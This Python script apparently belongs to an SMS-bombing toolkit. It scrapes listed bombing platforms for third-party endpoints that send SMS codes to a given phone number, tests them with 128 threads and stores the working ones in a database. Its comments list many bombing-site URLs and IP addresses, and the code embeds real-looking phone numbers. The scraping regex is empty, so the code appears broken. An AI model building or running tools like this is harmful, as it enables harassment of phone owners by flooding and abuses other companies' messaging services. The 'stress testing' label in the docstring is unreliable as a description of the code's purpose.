#!/usr/bin/python python3 # coding=utf-8 ''' Author: whalefall Date: 2021-08-07 14:15:50 LastEditTime: 2021-08-10 13:31:09 Description: 短信测压接口测试平台,测试200状态码的接口,不一定可用 ''' import requests import re from utils.db_sqlite import Sql import queue import threading class SMS(object): # 默认的请求密钥 default_phone = "15019682928" key_default = f"?hm={default_phone}&ok=" def __init__(self, website, key=key_default) -> None: self.url = website self.header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", } self.key = key self.api_queue = queue.Queue() self.db = Sql() self.lock = threading.Lock() def get_sms_api(self): '''请求短信轰炸平台''' with requests.session() as ses: ses.get(self.url, headers=self.header) resp = ses.get(f"{self.url}{self.key}", headers=self.header) # print(resp.text) pat = re.compile(r"") apis = pat.findall(resp.text) assert not apis == [], "未找到任何接口!" print("获取到的原始接口总数:%s" % (len(apis))) # 需要进行预处理 for api in apis: # if ("https://" or "http://") not in api: # continue # 排除接口中没有电话号码的网址 if SMS.default_phone not in api: continue # 网址处理 api = api.strip().replace(" ", "").replace( SMS.default_phone, "{phone}") # print(api) self.api_queue.put(api) print("Put到队列的接口总数:%s" % (self.api_queue.qsize())) def check_theads(self): '''多线程检查可用性''' while True: if self.api_queue.empty(): print(f"线程{threading.current_thread().name}结束") break api = self.api_queue.get() try: with requests.get(api.replace("{phone}", SMS.default_phone), headers=self.header, timeout=20,verify=False) as resp: if resp.status_code == 200: print( f"线程{threading.current_thread().name}:已添加{api}队列数:{str(self.api_queue.qsize())}") with self.lock: # 多线程写sqlite数据库要加锁 self.db.update(api) except Exception as e: print( f"线程{threading.current_thread().name}出错:{e}队列数:{str(self.api_queue.qsize())}") finally: self.api_queue.task_done() def main(self): self.get_sms_api() threads = [ threading.Thread(target=self.check_theads, name=f"Theads-{i}") for i in range(1, 129) ] for thread in threads: thread.start() if __name__ == '__main__': # 轰炸平台 # http://www.sss.pet/ # http://qazwd.top # http://www.yxdhma.cn # http://hz.7qi.me/index.php?0pcall={SMS.default_phone}&ok= # http://hzz.yunceng.top/index.php # https://97sq.com/dx/index.php # https://y06.top/index.php # http://8.210.210.197:5678/index.php # https://120.77.244.209/sdlz/yh.php # http://103.116.46.190/index.php? # http://120.26.174.82:85/index.php? # http://2hz.xyz/index.php?dnm=15019872239&ok= # http://42.193.114.190:1234/index.php? # http://47.119.139.230/index.php # 实例: http://hz.7qi.me/index.php?0pcall={SMS.default_phone}&ok= url = "http://hz.7qi.me/index.php" spider = SMS(url,key='?0pcall={SMS.default_phone}&ok=') spider.get_sms_api()